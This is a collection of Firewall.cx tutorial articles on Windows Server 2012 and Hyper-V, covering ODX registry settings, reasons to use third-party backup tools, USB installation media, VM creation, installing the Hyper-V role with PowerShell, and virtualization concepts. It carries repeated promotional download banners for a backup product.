  • If your SAN supports ODX; you should strongly consider enabling ODX on your Hyper-V hosts, as well as any VMs that connect directly to SAN storage LUNs.
To enable ODX, open PowerShell (using ‘Run as Administrator’) and type the following:

C:\> Set-ItemProperty hklm:\system\currentcontrolset\control\filesystem -Name "FilterSupportedFeaturesMode" –Value 0

Be sure to run this command on every Hyper-V host that connects to the SAN, as well as any VM that connects directly to the SAN.

This concludes our Windows 2012 Hyper-V Best Practices article. We hope you’ve found the information provided useful and that it helps make your everyday administration a much easier task.



  • Hits: 30199

The Importance of a Hyper-V & VMware Server Backup Tool - 20 Reasons Why You Should Use One

hyper-v-backup-toolUsing Hyper-V Server virtualization technology, you can virtualize your physical environment to reduce the cost of physical hardware. As part of IT best practices, you implement monitoring solutions to monitor the Hyper-V Servers and virtual machines running on them. You also take necessary actions to provide security to production environment by means of installing antivirus software. Then it also becomes necessary that you implement a backup mechanism to restore the business services as quickly as possible using a Hyper-V Server Backup tool.

This article is written to let you know as to why it is important to choose a dedicated Hyper-V Backup tool rather than relying on the existing mechanism as explained in bullet points below.

Users interested can also read our articles on Hyper-V Concepts/VDI, how to install Hyper-V Server & creating a Virtual Machine in Hyper-V.

FREE Hyper-V & VMware Backup:  Easy to use - Powerful features - Just works, no hassle:   It's FREE for Firewall.cx readers!  Download Now!

1. Flexibility

Third-party backup products are designed in such a way that the product is easy to use when it comes to backup or restore a virtual machine running on the Hyper-V Server. For example, using third-party backup product, you can select a virtual machine to backup or restore. In case of any disaster with a virtual machine, it becomes easy for an IT administrator to use the flexible backup product’s console to restore a virtual machine from backup copies and restore the business services as quickly as possible.

2. Verification Of Restores

Third-party backup products provide features to verify restores without impacting the production workload. IT administrators can use the verification feature to restore the backup copies to a standalone environment to make sure these backup copies can be restored successfully in the future, if required.

3. Designed For Use With Hyper-V

A third-party backup product is designed to use with a specific technology. For example, SQL Server Backup products are designed to backup/restore SQL Server database. Similarly, third-party Hyper-V Backup Products are designed to use specifically with Hyper-V Servers. Since these dedicated Hyper-V backup products are integrated with Hyper-V closely, they are more trusted by the IT organizations.

4. Full Backup Copy Of Virtual Machine

Although, starting with Windows Server 2012, Hyper-V Server offers replication services, sometimes referred as Hyper-V Replica, which can be used to build a disaster recovery scenario. The replication takes place every 5 minutes and changed data are replicated to the Hyper-V Servers located on the disaster recovery site. At the disaster site, you only have changed copies to restore virtual machine from a failure. What if you need to restore the full virtual machine? In that case, you would require the full backup copy of the virtual machine which is only possible if you are using a dedicated Hyper-V backup product.

5. Maintaining Different Versions Of Backup Copies

There are several reasons to maintain different versions of backup copies. One of the reasons is to revert back configuration to a point-in-time and another reason is to restore the business services as quickly as possible from a backup copy of your choice. A dedicated Hyper-V backup product can maintain several backup copies of a virtual machine.

6. Agentless Backups/Restores

Most of the third-party Hyper-V Backup products ship without an Agent. An agent is a piece of software which is installed on a Hyper-V server with communicates with the Backup software. In case of an agentless backup software, it is easy for administrators to perform backup/restore operations without worrying about the agent’s response.

7. Timely Backing up virtual machines

As part of the standard IT process, many organizations have a strategy in place in which backups for critical IT components including virtual machines are scheduled in a timely manner. These backups ensure that in case of any disaster (including physical), the service can be restored from a backup copy taken from a dedicated backup product rather than relying on native methods. The backup copy not only allows you to restore services but also helps you understand the impact of restoring a backup copy which is older.

8. Centralized Management

Backup software ships with a centralized management tool. The centralized management tool is capable of managing multiple Hyper-V Servers and checking the backup operations on multiple Hyper-V servers from a single console.

9. Avoid Unnecessary Files Backup

Since the backup software is designed to work with a specific technology, it is designed in such a way that it excludes the files which are not necessary to include in the virtual machine backup copies. This helps in reducing the backup copy size.

10. Compression

A dedicated Hyper-V backup product offers compressing backup data before it is written to the backup drive. You can enable/disable compression for all or selected virtual machines using the third-party backup product’s console.

11. Encryption

Security is the major concern for IT organizations nowadays. Third-party Hyper-V Backup products use encryption technology to encrypt backup copies stored on a backup drive. These backup copies can only be read by the same Hyper-V backup product.

12. Backup & Offsite Location

As part of the IT processes, every organization ensures that the backup copies are kept at an off-site location and these backup copies can be retrieved easily when the disaster takes place at the production site. Native tools do not support taking backup to an off-site location. Third-party backup products can provide off-site backup feature in which backup copiescan be saved to an off-site location without requiring much network bandwidth.

13. Incremental Backup Copies

A dedicated Hyper-V backup product ensures that only changed contents are backed up rather than taking a full backup copy every time the backup job runs.

14. More Backup Options

Third-party backup products provide more backup options like taking daily backups or monthly backups which can be scheduled at a pre-defined interval using the centralized management console.

15. Backup To External Sources

Third-party Hyper-V backup products support backing up virtual machines to external sources including USB external devices, eSata External drives, USB flash drives, Fileserver network shares, NAS devices, and RDX cartriges.

16. Backup Retention Policies

Old backup copies can be deleted if they are not required. You can configure the backup retention policy for each virtual machine. A dedicated Hyper-V Backup product can take automatic actions to delete the older backup copies as per the retention policy you configure.

17. Ability To Restore Individual Files Or Folders

Without using a dedicated Hyper-V backup product, it would be difficult for IT administrators to restore individual files/folders from a virtual machine backup copy. Some backup products provide a feature called “Exchange Level Item Restore” which can be used to restore selected emails or mailboxes from a backup copy of a virtual machine.

18. Application Vendor Recommendation For Backup Products

Many of the application vendors require that an enterprise backup system is installed in the production environment to backup data of their applications running in the virtual machines. Since most of the vendors impose this requirement, or recommend to back up application data using a dedicated Hyper-V backup product, native backup tools fail to do so.

19. Error & Reporting

Error and Reporting are the main features a third-party backup product provides. It lets you take necessary actions if a failure takes place with a backup or restore operation. Using reporting feature of a backup product, you can know how many virtual machines have been backed up successfully and how many virtual machines have failed.

20. Support

In case if you’re not able to restore virtual machine from a backup copy or hit with an error during the restore or backup operation, you can always contact product support to get you out from this situation. Many third-party backup products provide 24/7 support for their products.

FREE Hyper-V & VMware Backup:  Easy to use - Powerful features - Just works, no hassle:   It's FREE for Firewall.cx readers!  Download Now!

Altaro Hyper-V Backup

Altaro Hyper-V Backup offers a simple, easy-to-use solution for backing up Hyper-V VMs. It includes features such as offsite backup, remote management, Exchange item-level Restore, Compression, Encryption, and much more at an affordable cost.

  • Hits: 15285

How to Install Windows Server 2012 from USB Flash – ISO Image

Most would remember the days we had to have a CDROM or DVDROM in order to proceed with the installation of an operating system. Today, it is very common installing an operating system direct from an ISO image. When dealing with virtualized systems, it becomes pretty much a necessity.

This article will show how to install Windows Server 2012 (the same process can be used for almost all other operating systems) from a USB Flash.

The only prerequisite for this process to work is that you have a USB Flash big enough to fit the ISO image and the server (or virtualization platform) supports booting from a USB Flash. If these two requirements are met, then it’s a pretty straight-forward process.

 FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

The Windows 7 USB-DVD Tool

The Windows 7 USB/DVD Tool is a freely distributed application available in our Administrator Utilities download section. The application is required to transfer/copy the ISO Image of the operating system we want to install, to our USB Flash. The application is also able to burn the ISO image directly on a DVD – a very hand feature.

Download a copy, install and run it on the computer where the ISO image is available.

When the tool runs, browse to the path where the ISO image is located. Once selected, click on Next:

Installing Windows 2012 via USB Flash

At this point, we can choose to copy the image to our USB device (USB Flash) or directly on to a DVD. We select the USB Device option:

windows-2012-installation-usb-flash-2

In the next screen, we are required to select the correct USB device. If there are more than one USB storage devices connected, extra care must be taken to ensure the correct USB Flash is selected. In case no USB Flash has been connected, insert it now into your USB port and click on the refresh button for it to appear:

windows-2012-installation-usb-flash-3

After selecting the appropriate USB device, click on Begin Copying to start the transfer of files to the USB Flash:

windows-2012-installation-usb-flash-4

Once the copy process is complete, we are ready to remove our USB Flash and connect it to our server:

windows-2012-installation-usb-flash-6

 FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

This completes our article on how to install Windows Server 2012 from USB Flash device. We recommend users visit our Windows 2012 section and browse our growing database of high-quality Windows 2012 and Hyper-V Virtualization articles.

  • Hits: 52770

Creating a Virtual Machine in Windows Hyper-V. Configuring Virtual Disk, Virtual Switch, Integration Services and other Components

Our previous articles covered basic concepts of Virtualization along with the installation and monitoring of Windows 2012 Hyper-V. This article takes the next step, which is the installation of a guest host (Windows 8.1) on our Windows 2012 Hyper-V enabled server. The aim of this article is to show how easily a guest operating system can be installed and configured, while explaining the installation and setup process. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Steps To Create A Virtual Machine In Hyper-V

To begin the creation of our first virtual machine, open the Hyper-V manager in Windows Server 2012. On the Actions pane located on the right side of the window, click New and select Virtual Machine:

windows-hyper-v-host-1

 

Read the Before you begin page which contains imporant information and then click Next:

Windows Hyper-V Creating new VM

Type name of the virtual machine and configure the location to store virtual hard disk of this virtual machine. On server systems with shared storage devices, the virtual hard disk is best stored on the shared storage for performance and redundancy reasons, otherwise select a local hard disk drive. For the purpose of this lab, we will be using the server’s local C Drive:

Choose the generation of virtual machine and click Next. Generation 2 is new with Server 2012 R2. If the guest operating system will be running Windows Server 2012 or 64bit Windows 8, 8.1, select Generation 2, otherwise select Generation 1:

Hyper-V Installing VM & Selecting VM Generation

Next step involves assigning the amount of necessary memory. Under Assign Memory configure the memory and click Next. For the purpose of this lab, we will give our Windows 8.1 guest operating system 1 GB memory:

Hyper-V Assigning Memory to VM

Under configure networking tab, leave the default setting and click Next. You can create virtual switches later and re-configure the virtual machine settings as required:

Hyper-V Installing VM - Configuring VM Switch

Next, choose to create a virtual hard disk and specify the size. We allocated a 60 GB disk size for our Windows 8.1 installation. When ready, click Next:

Hyper-V Configuring Virtual Hard Disk

One of the great benefits with virtual machines is that we can proceed with the installation of the new operating system using and ISO image, rather than a CD/DVD.

Browse to the selected ISO image and click the Next button. The virtual machine will try to boot from the selected ISO disk when it starts, so it is important to ensure the ISO image is bootable:

Hyper-V Installing VM from ISO Image

The last step allows us to review the virtual machine’s configuration summary. When ready click the Finish button:

Hyper-V VM Summary Installation

Install Windows 8.1 Guest Operating System In Hyper-V Virtual Machine

With the configuration of our virtual machine complete, it’s time to power on our virtual machine and install the operating system. Open Hyper-V Manager, and under the Virtual Machines section double-click the virtual machine created earlier. Click on the start button from the Action Menu to power on the virtual machine:

Hyper-V Starting a VM Machine

After the virtual machine completes its startup process, press any key to boot from the Windows 8.1 disk (ISO media) we configured previously. The Windows 8 installation screen will appear in a couple of seconds. Click Next followed by the Install Now button to begin the installation of Windows operating system on the virtual machine:

Hyper-V Begin Windows 8 VM installation

After accepting the End User License Agreement (EULA) we can continue our post-installation setup by configuring the hard disk. Windows will then begin its installation and update the screen as it progresses. Finally, once the installation is complete, we are presented with the Personalization screen and finally, the Start Screen:

Hyper-V VM Windows8 Start Screen

After the operating system installation and configuration is complete, it is important to proceed with the installation of Integration Services.

Integration Services on Hyper-V is what VM Tools is for VMware. Integration Services will help significantly enhance the VM’s guest operating system performance, allow file copy from the host machine to the guest machine easily, time synchronization between host and guest machines, improve management of the VM by replacing the generic operating system drivers for the mouse, keyboard, video card, network and SCSI controller components.

Other services offered by Integration Services are:

  • Backup (Volume Snapshot)
  • Virtual Machine Connection Enhancements
  • Hyper-V Shutdown Service
  • Data Exchange

 To proceed with the installation of Integration Services, Go to the Virtual Machine’s console, selection Action, and click Insert Integration Services Setup Disk as shown below:

Hyper-V Host Intergration Services installation

In the Upgrade Hyper-V Integration Services dialog box, click OK and when prompted, click Yes to restart the virtual machine.  Using the Hyper-V Manager console, administrators can keep track of all VM's installed along side with their CPU Usage, Assigned memory and uptime:

Hyper-V Manager - VM Status

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

This completes our article covering the installation of a Virtual Machine within Hyper-V and setup of Integration Services. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

 

  • Hits: 23277

How to Install Windows 2012 Hyper-V via Server Manager & Windows PowerShell. Monitoring Hyper-V Virtual Machines

Our previous article covered the basic concepts of Virtualization and Windows Server 2012 Hyper-V.  This article takes a closer look at Microsoft’s Hyper-V Virtualization platform and continues with the installation of the Hyper-V role via the Windows Server Manager interface and Windows PowerShell command prompt.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Hyper-V is a server role used to create virtualized environment by deploying different types of virtualization technologies such as server virtualization, network virtualization and desktop virtualization. The Hyper-V Server role can be installed in Server 2012 R2 Standard, Datacenter or Essentials edition. Hyper-V version 3.0 is the latest version of Hyper V server available in Windows Server 2012 R2 versions. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

To learn more about the licensing restrictions on each Windows Server 2012 edition, read our article Windows 2012 Server Foundation, Essential, Standard & Datacenter Edition Differences, Licensing & Supported Features. 

Hyper-V Hardware Requirements

The Hyper-V server role requires specific system-hardware requirements to be met. The minimum hardware requirements are listed in the table below:

Hardware

Minimum Requirements

Processor

  • 1.4Ghz 64-bit with hardware assisted virtualization. Available in processors that include a virtualization option—specifically, Intel Virtualization Technology (Intel VT) or AMD Virtualization (AMD-V)
  • Hardware-enforced Data Execution Prevention (DEP) must be available and enabled. Specifically, you must enable the Intel XD bit (execute disable bit) or AMD NX bit (no execute bit).

Memory

512 MB

Network Adapter

At least one Gigabit Ethernet adapter

Disk Space

32 GB

Keep in mind that the above table specifies the minimum requirements. If you wanted to install Hyper-V in a production environment along with a number of virtual machines, you will definitely need more than 512MB memory and 32GB disk space.

Click here for Windows Server 2016 Hyper-V Requirements

Installing The Hyper-V Server Role In Server 2012 Using Server Manager

In Windows Server 2012, you can install Hyper-V server role by using the Server Manager (GUI) or windows PowerShell. In both cases, the installation requires the user to be an Administrator or member of Administrators or Hyper-V administrators group.

At first, open Server Manager. Click Manage and select the Add Roles and Features option:

windows-2012-hyper-v-install-config-1Add Role and Features

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Click Next on the Before you begin page.

Choose Role-based or feature-based Installation option and click Next button:

windows-2012-hyper-v-install-config-2
 Choose Role-based or feature-based Installation

In the next window, click on Select a server from the server pool option and select the server where you would like to install the Hyper-V server role. Click on Next after selecting the server:

windows-2012-hyper-v-install-config-3
 Select the Destination Server to Install Hyper-V

The next screen lists the available roles for installation, check Hyper-V and click Next:

windows-2012-hyper-v-install-config-4
Selecting the Hyper-V Role for Installation

Read the Hyper-V role information and click the Next button:

windows-2012-hyper-v-install-config-5
 Hyper -V Installation

The next step involves the creation of Virtual Switches. Choose your server’s physical network adapters that will take part in the virtualization:

windows-2012-hyper-v-install-config-6
Creating Your Virtual Switches

The selected physical network adapters (in case you have more than one available) will be used and shared by virtual machines to communicate with the physical network. After selecting the appropriate network adaptors, click Next to proceed to the Migration screen.

Under Migration, leave the default settings as is and click Next:

windows-2012-hyper-v-install-config-7
Leave Default Migration Settings

These settings can also be modified later on. Live Migration is similar to VMware’s vMotion, allowing the real-time migration of virtual machines to another physical host (server).

Under Default Stores, you can configure the location of hard disk files and configuration files of all virtual machines. This is a location where all the virtual machine data will reside. You can also configure a SMB shared folder (Windows network folder), local drive or even a shared storage device.

We will leave the settings to their default location and click the Next button.

windows-2012-hyper-v-install-config-8
Selecting a Location to Store the Virtual Machines

The final screen allows us to review our configuration and proceed with the installation by clicking on the Install button:

windows-2012-hyper-v-install-config-9
Hyper-V Installation Confirmation

 Windows will now immediately begin the installation of the Hyper-V role and continuously update the installation window as shown below.

windows-2012-hyper-v-install-config-10
Hyper-V Installation Progress

Once the installation of Hyper-V is complete, the Windows server will restart.

Installing Hyper-V Role Using Windows PowerShell

The second way to install the Hyper-V role is via Windows PowerShell. Surprisingly enough, the installation is initiated with a single command.

Type the following cmdlet in PowerShell to install the Hyper-V server role your Windows Server 2012:

C:\Users\Administrator> Install-WindowsFeature  –Name Hyper-V  –IncludeManagementTools  –Restart

windows-2012-hyper-v-install-config-11-large 
Hyper-V Installation with PowerShell   

To install Hyper-V server role on remote computer, include the -ComputerName switch.  In our example, the remote computer was named Voyager:

C:\Users\Administrator> Install-WindowsFeature –Name Hyper-V –ComputerName Voyager –IncludeManagementTools –Restart

Once the installation is complete, the server will restart. Once the server has booted, you can open Hyper-V Server Manager and begin creating the virtual machines:

windows-2012-hyper-v-install-config-12
Hyper-V Manager

Monitoring Of Hyper-V Virtual Machines

When working in a virtualization environment, it is extremely important to keep an eye on virtualization service and ensure everything is running smoothly.

Thankfully, Microsoft provides an easy way to monitor Hyper-V elements and take action before things get to a critical stage.

The Hyper-V Manager console allows you to monitor processor, memory, networking, storage and overall health of the Hyper-V server and its virtual machines, while other Hyper-V monitoring metrics are accessible through Task Manager, Resource Monitor, Performance Monitor and Event Viewer to monitor different parameters of Hyper-V server.

The screenshot below shows the Hyper-V Manager with one virtual machine installed.  At a first glance, we can view the VM’s state, CPU Usage, Assigned Memory and Uptime:

windows-2012-hyper-v-install-config-13-large
View Virtual Machine Status

Under Window’s Event Viewer we’ll find a number of advanced logs that provide a deeper view of the various Hyper-V components, as shown below:

windows-2012-hyper-v-install-config-14
Hyper-V Events (click to enlarge)

Addition information on Hyper-V can be obtained through the usage of Window’s Performance Monitor, which provides a number of Hyper-V useful counters as shown below:

windows-2012-hyper-v-install-config-15
Hyper-V Performance Monitor

Most experienced virtualization administrators will agree that managing and monitoring a virtualization environment can be a full-time job. It is very important to ensure your virtualization strategy is well planned and VMs are hosted on servers with plenty of resources such as Physical CPUs, RAM and Disk storage space, to ensure they are not starved of these resources during periods of high-utilization.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Keeping an eye on Hyper-V’s Manager, Performance Monitor counters and Event Viewer will help make sure no critical errors or problems go without notice.

  • Hits: 36695

Introduction To Windows Server 2012 R2 Virtualization - Understanding Hyper-V Concepts, Virtual Deployment Infrastructure (VDI) and more

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Virtualization is an abstraction layer that creates separate distinct virtual environments allowing the operation of different operating systems, desktops and applications under the same or combined pool of resources.   In the past couple of years, virtualization has gained an incredible rate of adoption as companies consolidate their existing server and network infrastructure, in hope to create a more efficient infrastructure that can keep up with their growing needs while at the same time keep the running and administration costs as low as possible.   

Our readers can visit our dedicated Windows Server 2012 Server section to read more on Windows Hyper-V Virtualization and Windows Server 2012 technical articles.

When we hear the word ‘Virtualization’, most think about ‘server virtualization’ – which of course is the most widely applied scenario, however today the term virtualization also applies to a number of concepts including:

  • Server virtualization: - Server virtualization allows multiple operating systems to be installed on top of single physical server.
  • Desktop virtualization: - Desktop virtualization allows deployment of multiple instances of virtual desktops to users through the LAN network or Internet. Users can access virtual desktops by using thin clients, laptops, or tablets.
  • Network virtualization: - Network virtualization also known as Software Defined Networking (SDN) is a software version of network technologies like switches, routers, and firewalls. The SDN makes intelligent decisions while the physical networking device forwards traffic.
  • Application virtualization: - Application virtualization allows an application to be streamed to many desktop users. Hosted application virtualization allows the users to access applications from their local computers that are physically running on a server somewhere else on the network.

This article will be focusing on the Server virtualization platform, which is currently the most active segment of the virtualization industry.  As noted previously, with server virtualization a physical machine is divided into many virtual servers – each virtual server having its own operating system.  The core element of server virtualization is the Hypervisor – a thin layer of software that sits between the hardware layer and the multiple operating systems (virtual servers) that run on the physical machine.

The Hypervisor provides the virtual CPUs, memory and other components and intercepts virtual servers requests to the hardware. Currently, there are two types of Hypervisors:

Type 1 Hypervisor – This is the type of hypervisor used for bare-metal servers. These hypervisors run directly on the physical server’s hardware and the operating systems run on top of it. Examples of Type-1 Hypervisors are Microsoft’s Hyper-V, VMware ESX, Citrix XenServer.

Type 2 Hypervisor – This is the type of hypervisor that runs on top of existing operating systems. Examples of Type-2 Hypervisors are VMware Workstation, SWSoft’s Parallels Desktop and others.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Microsoft Server Virtualization – Hyper-V Basics

Microsoft introduced its server virtualization platform Hyper-V with the release of Windows Server 2008. Hyper-V is a server role that can be installed from Server Manager or PowerShell in Windows Server 2012.

With the release of Windows Server 2012 and Windows Server 2012 R2, Microsoft has made lot of improvements in their Hyper-V virtualization platform. Features like live migration, dynamic memory, network virtualization, remoteFX, Hyper-V Replica, etc. have been added to new Hyper-V 3.0 in Server 2012.

Hyper-V is a type 1 hypervisor that operates right above the hardware layer. The Windows Server 2012 operating system remains above the hypervisor layer, despite the fact the Hyper-V role is installed from within the Windows Server operating system. The physical server where Hypervisor or Hyper-V server role is installed is called the host machine or virtualization server. Similarly, the virtual machines installed on Hyper-V are called guest machines.

Understanding Traditional vs Modern Server Deployment Models

Let’s take a look at the traditional way of server configuration. The figure below shows the typical traditional server deployment scenario where one server per application model is applied. In this deployment model, each application has its own dedicated physical server.

windows-hyper-v-concepts-vdi-1Traditional Server Deployment

This traditional model of server deployment has many disadvantages such as increased setup costs, management & backup overhead, increased physical space and power requirements, plus many more. Resource utilization of this type of server consolidation is usually below 10%.  Practically, this means that we have 5 underutilized servers.

Virtualization comes to dramatically change the above scenario.

Using Microsoft’s Windows Server 2012 along with the Hyper-V role installed, our traditional server deployment model is transformed into a single physical server with a generous amount of resources (CPU, Memory, Storage space, etc) ready to undertake the load of all virtual servers.

The figure below shows how the traditional model of server deployment is now virtualized with Microsoft’s Hyper-V server:

windows-hyper-v-concepts-vdi-2Hyper-V Server Consolidation

As shown in the figure above, all the five servers are now virtualized into single physical server. It is important to note that even though these virtual machines run on top of the same hardware platform, each virtual server is completely isolated from other virtual machines.

There are many benefits of this type of virtualized server consolidation. A few important benefits are reduced management overhead, faster server deployment, efficient resource utilization, reduced power consumption and so on.

Network Virtualization With Hyper-V

With the power of network virtualization you can create multi-tenant environment and assign virtual machines or group of virtual machines to different organizations or different departments. In a traditional network, you would simply create different VLANs on physical switches to isolate them from the rest of the network(s). Likewise, in Hyper-V, you can also create VLANs and virtual switches to isolate them from the network in the same way.

Readers can also refer to our VLAN section that analyses the concept of VLANs and their characteristics.

For example, you can configure a group of virtual machines on the 192.168.1.0/24 subnet and other group of virtual machines on 192.168.2.0/24 subnet.

windows-hyper-v-concepts-vdi-3Hyper-V Networking

Each virtual machine can have more than one virtual network adapter assigned to it. Like regular physical network adapters, the virtual network adapters can be configured with IP addresses, MAC addresses, NIC teaming and so on. These virtual network adapters are connected to a virtual switch. A Virtual switch is a software version of physical switch that is capable of forwarding traffic, VLAN traffic, and so on. The virtual switch is created from within the Hyper-V Manager and is then connected to one or more available physical network adapters of the host machine. The physical network adapters on the host machine are then connected to physical switch on the network.

As shown in figure 1.3, three VLANs are created under same virtual switch. The host is then connected to the physical switch by usually combining the multiple physical network cards into one also called LAG (Link Aggregation Group) or EtherChannel (Cisco’s implementation of LAG) interface. LAG or EtherChannel combines the speed of both physical network adapters.  If for example we have two 1Gbps physical network cards, with the use of LAG or EtherChannel, these are combine into a single 2Gbps network card.

 Microsoft’s Hyper-V supports the creation of three different types of virtual switches:

  1. Internal: - The internal virtual switch can communicate only between virtual machines.  A common example is a cluster based system where virtual servers connect with each other through a dedicated network connection. Internal virtual switches do not connect to the physical network infrastructure (e.g switches).
  2. External: - The external virtual switch can communicate directly with the physical network infrastructure. The virtual switch is used to for the seamless communication between the virtual machines and the physical network.
  3. Private: - The private virtual switch can communicate between virtual machines and the physical host only (physical hardware server).
FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Virtual Deployment Infrastructure (VDI) Deployment With Hyper-V

VDI is a new way of delivering desktops to end users. In VDI, virtual desktops are hosted centrally as virtual machines and are provided or streamed to users via the network or Internet using Remote Desktop Protocol (RDP) service. These virtual desktops can be used or accessed by users with different types of devices like, PCs, laptops, tablets, smart phones, thin clients, and so on. VDI have created a new hype of Bring Your Own Device (BYOD) concept. With BYOD policy implemented in the organization, users can bring their own devices like laptops, tablets, etc. and the company delivers the required virtual desktop via the network infrastructure.

VDI is an upcoming trend that offers many advantages such as:

  • Central management and control
  • Low cost since there is no need of desktop PCs. Alternate devices such as thin clients usually preferred
  • Low power consumption. Tablets, thin clients, laptops require low power compared to traditional desktop or tower PCs
  • Faster desktop deployments
  • More efficient backup

VDI is fully supported and can be implemented in Windows Server 2012 by installing Remote Desktop Services server role and configuring the virtualization host. You can create virtual machines running Windows XP/7/8 and easily assign the virtual machines to users.

We’ve covered a few of the important virtualization features deployable with Windows Server 2012 and Hyper-V, that allow organizations to consolidate their server, network and desktop infrastructure, into a more efficient model. 

Our readers can visit our dedicated Windows Server 2012 Server section to read more on Windows Hyper-V Virtualization and Windows Server 2012 offerings.

  • Hits: 59112

New Features in Windows Server 2012 - Why Upgrade to Windows 2012

There is no doubt that Cloud Computing is hot topic these days. Innovations in cloud computing models have made every industry and company IT departments to re-think their traditional model of computing. Realizing the benefits and challenges of cloud computing, Microsoft have jumped into the game of Cloud computing by releasing a cloud optimized server operating system called Windows Server 2012.

Windows Server 2012 has dozens of new features and services that makes it cloud ready. Windows Server 2012 R2 is the latest version of server operating system from Microsoft and successor of Server 2012. For more technical articles on Windows 2012 Server and Hyper-V Virtualization, visit ourWindows 2012 Server section.

Lets take a look at some of the new features Windows Server 2012 now supports:

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Windows Server Manager

Server Manager is one of the major changes of Windows Server 2012. With a new ‘look and feel’ of the Server Manager user interface, administrators now have the option to group multiple servers on their network and manage them centrally – a useful feature that will save valuable time. With this grouping feature, monitoring events, services, installed roles, performance, on multiple servers from a single window is easy, fast and requires very little effort.

windows-2012-features-1

Figure 1. Windows Server 2012 - Server Manager Dashboard (click to enlarge)

Similar to the Server Manager of previous version of windows servers, it can be used to install in Windows Server 2012 to install server roles and features.

Windows PowerShell 3.0

PowerShell 3.0 is another important improvement in Windows Server 2012. PowerShell is a command line and scripting tool designed to stretch greater control of window servers. The graphical user interface (GUI) of Windows Server 2012 is built on top of PowerShell 3.0. When you click buttons in GUI interface, PowerShell cmdlets & scripts are actually running in the background ‘translating’ mouse button commands to executable commands and scripts.

PowerShell scripts allow more tasks to be executed faster and within a short period of time, since the absence of the GUI interface means less crashes and problems.

windows-2012-features-2Figure 2. Windows Server 2012 PowerShell

Hundreds of PowerShell cmdlets have been added to Windows Server 2012 and we expect a lot more to be added in the near future, expanding their functionality and providing a new faster and more stable way to administer a Windows Server 2012.

Hyper-V 3.0

Similar to  VMware’s ESXi hypervisor, Hyper-V is Microsoft’s offering of a virtualization platform. This important feature allows to run many instances of virtual machines on single physical Windows Server 2012. Hyper-V features such as live migration, dynamic memory, network virtualization, remoteFX, Hyper-V Replica, etc. have made the Hyper-V platform more competitive against other alternatives.

The screenshot below shows the Hyper-V Manager console:

windows-2012-features-3Figure 3. Windows Server 2012 - Hyper-V Manager (click to enlarge)

When combined with Microsoft’s System Center, Windows Hyper-V becomes much more powerful and a very competitive solution that can even support private or public clouds.

Hyper-V Replica

Windows Server 2012 Hyper-V roles introduces a new capability – Hyper-V Replica - a feature many administrators will welcome.

This new feature allows the asynchronous replication of selected VMs to a backup replica server.  On the local LAN, it means you get a full backup copy of your VMs to another hardware server, while on a WAN scale this can also be extended to backup VMs to a designated replicate site across a WAN infrastructure. Common examples of WAN backup replication are disaster recovery sites. The replication cycle has a minimum setting of 15 minute gaps between every replication. This means the backup VM will be 15 minutes behind its source - the primary VM. 

When installed, Hyper-V Replica creates a snapshot of whole server, which usually requires a lot of time depending on the amount of data, and from there on, only changes are replicated. 

Server Message Block (SMB) 3.0

SMB is a file sharing protocol used in windows servers. In Windows Server 2012, SMB is now up to version 3.0 with new interesting features such as support for deduplication, hot pluggable interfaces, multichannel, encryption, Volume Shadow Copy Service (VSS) for shared files, and many more.

In addition, Hyper-V’s Virtual Hard Disk (VHD) files and virtual machines can also be hosted on shared folders. This allows the effective usage of shared folders, ensuring you make the most out of all available resources.

Dynamic Access Control (DAC)

DAC is a central management system used to manage security permissions of files and folders.  In a nutshell, DAC is new and flexible way of setting up permission on files and folders. With DAC, an administrator can now classify the data according to user claims, device claims and resource properties. Once data is classified, you can setup the permissions to control user access to the classified data.

Storage Space

Storage Space is also another new feature of Windows Server 2012. This new feature pools different physical disks together and divides them into different spaces. These spaces are then used like regular disks. In the storage pool control panel (shown below), you can add any type or size of physical disks (e.g SSD, SCSI, SATA etc).  You can also configure mirroring, raid redundancy and more.

Likewise, you can add storage at any time and the new space will be automatically available for use in storage space. Provisioning is also supported in Storage Space, allowing you to specify whether the new space be thin provisioned or thick. With thin provisioning, disk space is incremented automatically on a “as needed” basis, eliminating the need of occupying unnecessary disk space. 

windows-2012-features-4-large Figure 4. Windows Server 2012 - Storage Space

Following are pointers on the main features provided by Storage Space:

  • Obtain and easily manage reliable and scalable storage with reduced cost
  • Aggregate individual drives into storage pools that are managed as a single entity
  • Utilize simple inexpensive storage with or without external storage
  • Provision storage as needed from pools of storage you’ve created
  • Grow storage pools on demand
  • Use PowerShell to manage Storage Spaces for Windows 8 clients or Windows Server 2012
  • Delegate administration by specific pool
  • Use diverse types of storage in the same pool: SATA, SAS, USB, SCSI
  • Use existing tools for backup/restore as well as VSS for snapshots
  • Designate specific drives as hot spares
  • Automatic repair for pools containing hot spares with sufficient storage capacity to cover what was lost
  • Management can be local, remote, through MMC, or PowerShell

DirectAccess

DirectAccess is Microsoft’s answer to VPN connectivity, allowing remote clients to access your network under an encrypted connection.  Thanks to its easy installation and improved friendly interface, administrators are able to quickly setup and manage VPN services on their Windows Server 2012 system. 

DirectAccess supports SSL (WebVPN) and IPSec protocols for VPN connections. A very interesting feature is the ‘Permanent VPN’ which allows mobile users to establish their VPN initially and then place it ‘on hold’ when their internet connectivity is lost.  The VPN session will then automatically resume once the user has Internet access again. 

